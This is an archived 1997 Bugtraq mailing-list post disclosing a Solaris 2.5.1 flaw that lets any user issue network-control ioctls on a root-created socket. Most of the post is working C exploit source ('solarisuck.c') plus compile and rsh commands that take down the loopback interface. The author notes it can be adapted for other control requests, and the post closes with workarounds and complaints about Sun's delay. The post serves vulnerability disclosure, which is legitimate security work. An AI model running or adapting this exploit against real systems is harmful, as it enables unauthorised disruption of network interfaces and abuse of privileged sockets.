[4736] in bugtraq


Solaris 2.5.1 party piece

daemon@ATHENA.MIT.EDU (Alan Cox)
Thu Jun 19 20:04:59 1997

Date: 	Thu, 19 Jun 1997 15:27:39 +0100
Reply-To: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
X-To:         bugtraq@crimelab.com
To: BUGTRAQ@NETSPACE.ORG

 Well CERT have had this for a year, AUSCERT for a couple of weeks, and
now it's time bugtraq had it.

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck


 solarisuck.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>


int main(int argc, char *argv[])
{
        struct ifreq please_break_me;

        /* fd 0 is stdin.  Under rsh it is the connection socket that
           in.rshd created as root and handed to this unprivileged shell. */
        memset(&please_break_me, 0, sizeof please_break_me);
        strcpy(please_break_me.ifr_name, "lo0");
        please_break_me.ifr_flags = 0;   /* clear IFF_UP: loopback goes down */

        /* Solaris 2.5.1 decides the privilege check by who created the
           socket, not who issues the ioctl, so this works for any user. */
        if (ioctl(0, SIOCSIFFLAGS, &please_break_me) == -1)
                perror("Damn it didnt work. Obviously not Solaris ;)");
        return 0;
}


You can adjust this to do other things. Basically any user can do network control
requests on a root-created socket descriptor.


Workarounds:
 1.  Disable rsh and any non-root-owned inetd tasks - breaks remote tar etc.
 2.  Run an OS that the vendor doesn't take a year to fix bugs in

 I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
 to prove Sun have sat on this for ages.

 Alan
